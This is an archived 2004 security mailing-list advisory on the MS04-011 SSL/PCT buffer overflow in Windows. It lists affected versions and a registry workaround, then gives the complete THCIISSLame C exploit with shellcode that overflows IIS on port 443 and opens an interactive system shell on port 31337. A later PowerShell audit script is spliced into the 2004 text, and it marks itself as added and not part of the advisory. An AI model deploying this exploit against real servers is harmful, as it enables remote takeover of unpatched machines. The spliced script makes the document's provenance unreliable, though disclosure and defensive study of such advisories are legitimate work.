[NT] Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/22/04

  • Next message: SecuriTeam: "[EXPL] Linux kernel 2.x setsockopt MCAST_MSFILTER Exploit"
    To: list@securiteam.com
    Date: 22 Apr 2004 12:44:31 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    ISS X-Force has discovered a remotely exploitable buffer overflow
    condition in the Microsoft Secure Sockets Layer (SSL) library. SSL is an
    encryption technology commonly used to secure Web and email
    communications. A buffer overflow condition occurs when processing PCT 1.0
    handshake packets that can lead to remote, privileged compromise of
    affected Windows installations.

    DETAILS

    Affected Versions:
     * Microsoft Windows 2000 up to and including SP4
     * Microsoft Windows NT version 4 up to and including SP6a
     * Microsoft Windows XP up to SP1

    Note: The SSL library included in Windows Server 2003 contains the
    vulnerability. However, the PCT 1.0 protocol is disabled by default.

    Impact:
    If any SSL-enabled services are present, and both the PCT 1.0 and SSL 2.0
    protocols are enabled, remote attackers may exploit the buffer overflow
    condition to execute arbitrary code on vulnerable Windows server
    installations. This code would run with local system privileges. The
    protocols necessary for remote exploitation are enabled by default in
    Windows 2000 and Windows NT version 4.

    Common vectors for exploitation might include Internet Information Server
    (IIS), Exchange Server, Active Directory, and potentially any software
    making use of the Microsoft SSL library including unlisted third-party
    software.

    The severity of this vulnerability is compounded by the fact that SSL is
    most often used to secure communications involving confidential or
    valuable financial information, and that firewalls and packet filtering
    alone will not be able to stop attacks. X-Force believes that hackers will
    aggressively target this vulnerability given the high-value nature of Web
    sites protected by SSL.

    Solution:
    The PCT 1.0 protocol is a legacy protocol that is not required for secure
    SSL communication. The PCT 1.0 protocol can be safely disabled as a
    workaround for the vulnerability described in this advisory. However,
    systems using Microsoft Message Queue or MSMQ cannot disable PCT 1.0
    without impacting MSMQ. In this circumstance, SSL 2.0 can be safely
    disabled to close the vulnerability. Successful exploitation of the
    vulnerability requires that both PCT 1.0 and SSL 2.0 are enabled. The
    vulnerability is removed if either PCT 1.0 or SSL 2.0 is disabled.

    Customers are encouraged to immediately evaluate the two scenarios
    described above and select a workaround that best applies to their
    environment.

    Microsoft has published a Knowledge Base article (187498) that describes
    how to disable certain SSL protocols, including PCT 1.0, SSL 2.0 and SSL
    3.0. Microsoft Knowledge Base article 187498 is available at the following
    address:
     http://support.microsoft.com/support/kb/articles/q187/4/98.asp
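    The workaround above is a SCHANNEL registry change. The following PowerShell script is an added example for auditing and applying it; it is not part of the advisory, the Knowledge Base article, or the THC exploit. It assumes the server-side protocol keys documented in KB 187498 (Protocols\<name>\Server with a DWORD value Enabled, where 0 disables the protocol), an elevated session on the affected host, that the Message Queuing service is registered under the name MSMQ, and that SCHANNEL only reads the change after a reboot.

    ```powershell
    # Added example: audit PCT 1.0 / SSL 2.0 server support in SCHANNEL and disable one of them
    # per the advisory (exploitation needs BOTH enabled). Registry layout per KB 187498 (assumed).
    $schannel = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols'

    function Get-SchannelServerState {
        param([Parameter(Mandatory)][string]$Protocol)   # e.g. 'PCT 1.0' or 'SSL 2.0'
        $key = Join-Path $schannel "$Protocol\Server"
        if (-not (Test-Path $key)) {
            # No key means the OS default applies: enabled on Windows 2000 and NT 4 for both.
            return [pscustomobject]@{ Protocol = $Protocol; State = 'default (enabled)'; Key = $key }
        }
        $v = (Get-ItemProperty -Path $key -Name Enabled -ErrorAction SilentlyContinue).Enabled
        $state = if ($null -eq $v) { 'default (enabled)' } elseif ($v -eq 0) { 'disabled' } else { 'enabled' }
        [pscustomobject]@{ Protocol = $Protocol; State = $state; Key = $key }
    }

    function Disable-SchannelServerProtocol {
        param([Parameter(Mandatory)][string]$Protocol)
        $key = Join-Path $schannel "$Protocol\Server"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # Enabled = 0 turns the protocol off for incoming (server-side) handshakes.
        New-ItemProperty -Path $key -Name Enabled -PropertyType DWord -Value 0 -Force | Out-Null
    }

    # Audit first: the vulnerable condition is both protocols accepting server handshakes.
    $states = @('PCT 1.0', 'SSL 2.0' | ForEach-Object { Get-SchannelServerState $_ })
    $states | Format-Table -AutoSize

    $bothOn = @($states | Where-Object { $_.State -ne 'disabled' }).Count -eq 2
    if ($bothOn) {
        # Prefer dropping the legacy PCT 1.0; on MSMQ hosts the advisory says to drop SSL 2.0 instead.
        # Service name 'MSMQ' is an assumption made here, not stated in the advisory.
        $msmq = Get-Service -Name MSMQ -ErrorAction SilentlyContinue
        $toDisable = if ($msmq) { 'SSL 2.0' } else { 'PCT 1.0' }
        Disable-SchannelServerProtocol -Protocol $toDisable
        Write-Host "Disabled $toDisable server support; reboot required before SCHANNEL applies it."
    } else {
        Write-Host 'At least one of PCT 1.0 / SSL 2.0 is already disabled; no change made.'
    }
    ```

    Run the audit part alone on a fleet first; a host where either protocol already reports "disabled" is outside the exploitable condition and needs no change, which matches the advisory's statement that disabling either protocol removes the vulnerability.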

    Additional Information:
    Microsoft Security Bulletin MS04-011:
    http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

    Exploit:
    /*****************************************************************************/
    /* THCIISSLame 0.1 - IIS 5 SSL remote root exploit */
    /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
    /* THC PUBLIC SOURCE MATERIALS */
    /* */
    /* Bug was found by Internet Security Systems */
    /* Reversing credits of the bug go to Halvar Flake */
    /* */
    /* compile with MS Visual C++ : cl THCIISSLame.c */
    /* */
    /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
    /* scut, stealth, FtR and Random */
    /*****************************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <winsock2.h>

    #pragma comment(lib, "ws2_32.lib")

    #define jumper "\xeb\x0f"
    #define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

    char sslshit[] =
    "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

    char shellcode[] =
    "\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
    "\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
    "\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
    "\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
    "\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
    "\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
    "\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
    "\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
    "\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
    "\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
    "\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
    "\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
    "\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
    "\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
    "\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
    "\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
    "\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
    "\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
    "\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
    "\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
    "\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";

    void usage();
    void shell(int sock);

    int main(int argc, char *argv[])
    {
      unsigned int i,sock,sock2,addr,rc;
      unsigned char *badbuf,*p;
      unsigned long offset = 0x6741a1cd;
      unsigned long XOR = 0xffffffff;

      struct sockaddr_in mytcp;
      struct hostent * hp;
      WSADATA wsaData;

      printf("\nTHCIISSLame v0.1 - IIS 5.0 SSL remote root exploit\n");
      printf("tested on Windows 2000 Server german/english SP4\n");
      printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

      if(argc<2 || argc>2)
       usage();

      badbuf = malloc(347);
      memset(badbuf,0,347);

      printf("\n[*] building buffer\n");

      p = badbuf;

      memcpy(p,sslshit,sizeof(sslshit));

      p+=sizeof(sslshit)-1;
      
      strcat(p,jumper);

      strcat(p,greetings_to_microsoft);

      offset^=XOR;
      strncat(p,(unsigned char *)&offset,4);

      strcat(p,shellcode);

      if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
      {
       printf("WSAStartup failed !\n");
       exit(-1);
      }
      
      hp = gethostbyname(argv[1]);

      if (!hp){
       addr = inet_addr(argv[1]);
      }
      if ((!hp) && (addr == INADDR_NONE) )
      {
       printf("Unable to resolve %s\n",argv[1]);
       exit(-1);
      }

      sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      if (!sock)
      {
       printf("socket() error...\n");
       exit(-1);
      }
      
      if (hp != NULL)
       memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
      else
       mytcp.sin_addr.s_addr = addr;

      if (hp)
       mytcp.sin_family = hp->h_addrtype;
      else
       mytcp.sin_family = AF_INET;

      mytcp.sin_port=htons(443);

      printf("[*] connecting the target\n");

      rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
      if(rc==0)
      {
          send(sock,badbuf,346,0);
          printf("[*] Exploit send successfully ! Sleeping a while ....\n");
          Sleep(1000);
      }
      else
       printf("\nCan't connect to ssl port 443!\n");
       
      if(rc==0)
      {
       printf("[*] Trying to get a shell\n\n");
       sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
       mytcp.sin_port = htons(31337);
       rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
       if(rc!=0)
       {
         printf("can't connect to port 31337 ;( maybe firewalled ...\n");
         exit(-1);
       }
       shell(sock2);
      }

      shutdown(sock,1);
      closesocket(sock);

      free(badbuf);

      exit(0);
    }
     
    void usage()
    {
     unsigned int a;
     printf("\nUsage: <Host>\n");
     printf("Sample: THCIISSLame 31.33.7.23\n\n");
     exit(0);
    }

    void shell(int sock)
    {
     int l;
     char buf[1024];
     struct timeval time;
     unsigned long ul[2];

     time.tv_sec = 1;
     time.tv_usec = 0;

     while (1)
     {
      ul[0] = 1;
      ul[1] = sock;

      l = select (0, (fd_set *)&ul, NULL, NULL, &time);
      if(l == 1)
      {
       l = recv (sock, buf, sizeof (buf), 0);
       if (l <= 0)
       {
        printf ("bye bye...\n");
        return;
       }
      l = write (1, buf, l);
       if (l <= 0)
       {
        printf ("bye bye...\n");
        return;
       }
      }
      else
      {
       l = read (0, buf, sizeof (buf));
       if (l <= 0)
       {
        printf("bye bye...\n");
        return;
       }
       l = send(sock, buf, l, 0);
       if (l <= 0)
       {
        printf("bye bye...\n");
        return;
       }
      }
     }
    }

    ADDITIONAL INFORMATION

    The information has been provided by Mark Dowd and Neel Mehta of the ISS
    X-Force.

    The exploit has been provided by: Johnny Cyberpunk of THC
    (johncybpk@gmx.net)

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

